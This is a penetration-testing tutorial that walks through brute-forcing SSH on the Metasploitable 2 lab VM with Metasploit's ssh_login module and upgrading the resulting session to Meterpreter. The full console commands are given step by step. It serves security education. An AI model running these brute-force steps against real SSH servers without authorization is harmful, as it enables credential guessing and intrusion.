avatarCybertech Maven

Summary

The article provides a detailed guide on exploiting SSH Port 22 on Metasploitable 2 using the Metasploit Framework to simulate unauthorized access by ethical hackers and penetration testers for educational purposes.

Abstract

The article is part of a penetration testing series focused on hacking Metasploitable 2, a vulnerable virtual machine designed for educational purposes. It specifically addresses the exploitation of SSH Port 22, detailing the process of using Metasploit to perform reconnaissance, select and configure the appropriate SSH login exploit, and execute a brute force attack to gain unauthorized access. The author emphasizes the importance of understanding such tactics to enhance system security and outlines the steps taken to achieve an SSH session, including setting up the lab environment, conducting an Nmap scan, and using Metasploit modules and payloads. The article concludes with a successful demonstration of accessing the target system, stressing the educational intent and the necessity of adhering to legal and ethical standards.

Opinions

  • The author believes in the educational value of understanding hacking techniques to improve system defenses.
  • Ethical hacking and penetration testing are presented as critical components in developing robust cybersecurity measures.
  • There is a strong emphasis on the legal and ethical use of the information provided, with a clear disclaimer about the consequences of misuse.
  • The article aims to enlighten a broader audience about cybersecurity risks and the tools used in penetration testing.
  • The author encourages reader engagement and feedback, indicating a commitment to community learning and discourse.

Penetration Testing Series: Hacking Metasploitable 2 By Exploiting SSH Port 22

Introduction

This article continues my penetration testing series, exploring hacking Metasploitable 2. In this project, we delve into penetration testing by exploring the process of exploiting SSH Port 22 on the renowned vulnerable virtual machine, Metasploitable 2.

By targeting Metasploitable 2’s vulnerable SSH service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.

SSH (Secure Shell) is a widely used network protocol for secure remote login and file transfer. It provides encrypted communication between a client and a server over a computer network. While SSH is a secure protocol, attackers can still target it if not correctly configured. This article will focus on exploiting Port 22, the default port SSH servers used for communication.

Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the SSH service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.

It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

  • VirtualBox
  • Kali Linux Virtual Machine (VM)
  • Metasploitable 2 VM

Part 1: Reconnaissance

To begin, confirm the information about the target system. Follow these steps:

  1. Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig

2. To access the Nmap scan file from the previous article on https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897, enter the command “cat META2.txt” in the terminal.

cat META2.txt

Our target system is running OpenSSH 4.7p1 Debian on port 22.

Part 2: Metasploit

Follow these steps to utilize Metasploit to gain access to the target system:

  1. Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole

2. Use the “search” command followed by the “ssh_login” to search for information within the Metasploit Framework related to the SSH login.

search ssh_login

We received back two exploits.

3. Type “use 0” to select and use the first exploit.

4. Type “show options” to view the required parameters that need to be set for the exploit.

show options

5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18), setting the USER_FILE to the Users.txt, and the PASS_FILE to the Passwords.txt.

The wordlists, Users.txt and Passwords.txt, were generated from the previous article in the penetration testing series, as mentioned in https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897.

set RHOSTS 10.60.0.18
set USER_FILE Users.txt
set PASS_FILE Passwords.txt

6. Type “show options.”

7. We need to update the value of STOP_ON_SUCCESS from false to true so that once we successfully find a valid username and password, the brute force scanner stops.

8. Type the following “set” command to change the value of STOP_ON_SUCCESS from false to true.

set STOP_ON_SUCCESS true

9. Again, Type “show options” to confirm that you correctly set the RHOSTS, USER_FILE, PASS_FILE, and STOP_ON_SUCCESS.

10. Type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via SSH Port 22.

exploit

We successfully used brute force to obtain the username and password “msfadmin,” as a result, we could establish an SSH session 2 to interact with it.

11. Type “sessions” to view the active sessions.

sessions

12. We are going to use session 1 by typing the following command:

sessions -u 1

Meterpreter session 3 opened.

13. Type “sessions 3”.

sessions 3

14. Type the “sysinfo” and “ifconfig” commands to interact with the Metasploitable 2 machine.

sysinfo
ifconfig

We were able to hack Metasploitable 2 by exploiting SSH through Port 22.

To exit the meterpreter session and Metasploit, type the following commands:

exit
exit -y

Conclusion

I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.

I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.

If you would like to access more articles, please follow me.

Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!

The Gray Area is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out this form! To get updates whenever The Gray Area publishes an article, check out our Twitter page, @TGAonMedium.

Cybersecurity
Penetration Testing
Ethical Hacking
Ssh
Metasploit
Recommended from ReadMedium